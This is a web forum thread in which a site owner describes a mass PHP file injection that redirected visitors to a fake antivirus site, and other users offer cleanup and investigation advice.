WEBSITE HIJACKED - Php code infected - HELP?

  • Context: PHP 
  • Thread starter Thread starter bigdawg723
  • Start date Start date
  • Tags Tags
    Code Php
Click For Summary

Discussion Overview

The discussion revolves around a website that has been hijacked, with PHP code infected by a malicious script that redirects visitors to a fake antivirus site. Participants explore the nature of the infection, potential vulnerabilities, and steps to mitigate the issue.

Discussion Character

  • Exploratory
  • Technical explanation
  • Debate/contested

Main Points Raised

  • Josh describes the infection affecting every PHP file on his website, including subdomains, with a malicious script added to the top of each file.
  • Some participants question the source of the subdomain creation process and whether it is from a trusted source.
  • One participant suggests searching for the specific PHP line added to identify others who may have faced similar issues.
  • Another participant emphasizes the need to investigate files with write access and check for any suspicious modifications or binaries that could cause reinfection.
  • There is a recommendation to examine HTTP access logs to trace the infection's origin and identify any relevant file accesses during that time.
  • One participant shares a link to a blog post indicating that similar infections have affected many GoDaddy shared servers, expressing frustration with the hosting provider's response.
  • Another participant presents two options: either delete everything and start anew or identify and fix the vulnerability before addressing the database issue.
  • A later reply urges Josh to shut down his site until the problem is resolved.

Areas of Agreement / Disagreement

Participants express varying opinions on how to handle the situation, with no consensus on the best course of action. Some focus on identifying vulnerabilities, while others suggest starting over.

Contextual Notes

There are unresolved questions regarding the source of the infection and the specific vulnerabilities that allowed it to occur. The discussion highlights the complexity of the situation, with multiple potential points of failure.

bigdawg723
Messages
13
Reaction score
0
WEBSITE HIJACKED - Php code infected! - HELP!?

Hey All,

I've got a major *$%#@ problem. I'm freaking out here.

Check this out.

On my website, I have a way to allow visitors... to become distributors and sell my product as well. When they become a distributor, it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.

So... not only do I have my set of about 20 php pages and a solid 20+ php includes... I have to multiple those numbers by roughly... 50 distributors or more!

Here's my problem.

EVERY, not just a few... not just the pages (also includes, etc)... not just my root directory (also all subdomains)... EVERY PHP FILE has a new line of code at the very top that is a Script to a php file (oo.php) on another website that redirects every visitor to a new site and it's one of those 'fake antivirus' programs that are, essentially, a virus in their own.

When I first saw the redirect, I knew I was hijacked... but I assumed it was just 1 thing injected into my SQL Databases... or a simple code change or file somewhere... but it is THOUSANDS of files... and yes, I could go ahead and remove that snippet of code from each php file... but I still wouldn't know where it came from and I can only assume that the process which infected those pages still exists and would reinfect them all again the the very near future.

I'm begging you for help.

I know my contact form doesn't "close" the inputs or something... because it sends all contacts to the database table... and there's some major vulnerability there... but I couldn't find any entry in that database with any malicious code... perhaps it auto-deleted itself or something?

Please, I beg you, please lend a hand if you know anything about this.

Thank You,
Josh
 
Technology news on Phys.org


it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.
What is "it"? Is "it" from a trusted source? I am by no means an expert with these things, but that was the first thing that got my attention.
 


First up, do a search on google for text snippits of the php line that was added. If someone else has been fighting this battle already, they'll be a good candidate to help solve the problem.

Otherwise, not enough information. Something on your site that has write access to your PHP files is either currently compromised, or is still vulnerable and was/is being attacked. What OS are you on? Do you have script access? Cron access? Who's your ISP? Has anything else been modified?

Step 1, look for non-PHP files that have been modified recently. Hopefully, you can use that to detect whether or not there's some binary file or otherwise that's sitting on your system that will re-infect you. That's dangerous. If you have some that look suspicious, quarantine them. Make them non-executable and non-readable-- change the file name, whatever. There's a distinct possibility if you've got other programs that have installed themselves, that they'll try to re-install themselves, so check any config files you have. Heck, compare them to backups with your ISP.

Step 2, look for PHP files that have changed that reference the evil site in question. That is, it's possibly just a single PHP file that has write access to other PHP files, and if that PHP file is executed again, you're re-infected.

Step 3, look at your HTTP access log. See what was happening around the time that you were infected, and examine whatever relevant files were accessed during that time. Chances are, the attack started with a web request, and that's one way of trying to narrow down the point of attack. Otherwise, if the infection started in some OTHER way, talk to your ISP.

DaveE
 


I searched for that PHP thread... found it!

http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html

Apparently this happened to "hundreds" of GoDaddy shared servers... I assume thousands!

I've never seen this before... I have a few words for GoDaddy... but they don't care, maybe time for a host switch? They said it was due to outdated versions of WOrdPress... mine was fully up-to-date at the time of the attack. BS

Thanks for the quick replies though!

I love this forum - more helpful than any PHP-only forum I've found thus far.
 


You have really 2 ways to go with this:

1) Delete everything and start from new
2) Figure out how and where the vulnerability occurred, fix it, and then go about fixing the database issue.Good luck.
 


Please tell me that you have shut down your site until you fix the problem.
 

Similar threads

PHP How can I decode multiple layers of encoded php code?
  • · Replies 9 ·
Replies
9
Views
3K
PHP Would like some help understanding website management
  • · Replies 12 ·
Replies
12
Views
2K
Do you want to build a website?
  • · Replies 15 ·
Replies
15
Views
3K
PHP Learning Web Programming: MySQL & PHP for Complex Websites
  • · Replies 16 ·
Replies
16
Views
2K
PHP Advice on how to set column widths in php
  • · Replies 7 ·
Replies
7
Views
7K
PHP Limiting Output from Unmaintainable PHP Code
  • · Replies 7 ·
Replies
7
Views
3K
PHP Using PHP and cURL to submit POST requests to a website
  • · Replies 7 ·
Replies
7
Views
6K
PHP Help with php and this part of the code ?
  • · Replies 1 ·
Replies
1
Views
3K
PHP Preventing SQL Injection in PHP Forms
  • · Replies 4 ·
Replies
4
Views
7K
PHP PHP - Wrong datatype for second argument
  • · Replies 2 ·
Replies
2
Views
5K